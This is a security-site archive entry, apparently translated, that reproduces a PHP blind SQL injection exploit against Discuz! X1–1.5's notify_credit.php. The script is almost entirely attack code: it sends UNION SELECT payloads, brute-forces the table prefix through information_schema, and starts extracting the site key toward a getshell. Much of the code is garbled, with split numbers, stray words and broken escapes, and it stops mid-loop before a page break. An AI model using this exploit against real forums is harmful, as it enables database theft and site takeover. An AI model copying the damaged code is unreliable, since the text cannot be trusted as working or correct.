Discuz X1-x1. 5 Blind SQL injection Getshell Xday-vulnerability warning-the black bar safety net

2011-06-03T00:00:00
ID MYHACK58:62201130698
Type myhack58
Reporter 佚名
Modified 2011-06-03T00:00:00

Description

<? php

print_r('

+---------------------------------------------------------------------------+

Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57 2010.11.05

mail: toby57 at 1 6 3 dot com

team: http://www.wolvez.org

+---------------------------------------------------------------------------+

');

if ($argc < 2) {

print_r('

+---------------------------------------------------------------------------+

Usage: php '.$ argv[0].' url [pre]

Example:

php '.$ argv[0].' http://localhost/

php '.$ argv[0].' http://localhost/ xss_

+---------------------------------------------------------------------------+

');

exit;

}

error_reporting(7);

ini_set('max_execution_time', 0);

$url = $argv[1];

$pre = $argv[2]?$ argv[2]:'pre_';

$target = parse_url($url);

extract($target);

$path1 = $path . '/api/trade/notify_credit.php';

$hash = array();

$hash = the array_merge($hash, range(4 8, 5 7));

$hash = the array_merge($hash, range(9 7, 1 0 2));

$tmp_expstr = "'";

$res = send();

if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops. I can NOT hack it.');}

preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match);

if($match[1])$pre = $match[1];

$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE "='";

$res = send();

if(strpos($res,"doesn't exist")!== false){

echo "Table_pre is WRONG!\ nReady to Crack It. Please Waiting..\n";

for($i = 1;$i<2 0;$i++){

$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',"))=$i AND "='";

$res = send();

if(strpos($res,'SQL syntax')!== false){

$pre = ";

$hash2 = array();

$hash2 = array_merge($hash2, range(4 8, 5 7));

$hash2 = array_merge($hash2, range(9 7, 1 2 2));

$hash2[] = 9 5;

for($j = 1;$j <= $i; $j++){

for ($k = 0; $k <= 2 5 5; $k++) {

if(in_array($k, $hash2)) {

$char = dechex($k);

$tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema. the columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',"),$j,1)=0x{$char} AND "='";

$res = send();

if(strpos($res,'SQL syntax')!== false){

echo chr($k);

$pre .= chr($k);break;

}

}

}

}

if(strlen($pre)){echo "\nCracked...Table_Pre:".$ pre."\ n";break;}else{die('GET Table_pre Failed..');};

} } };

echo "Please Waiting....\ n";

$sitekey = ";

for($i = 1;$i <= 3 2; $i++){

[1] [2] [3] next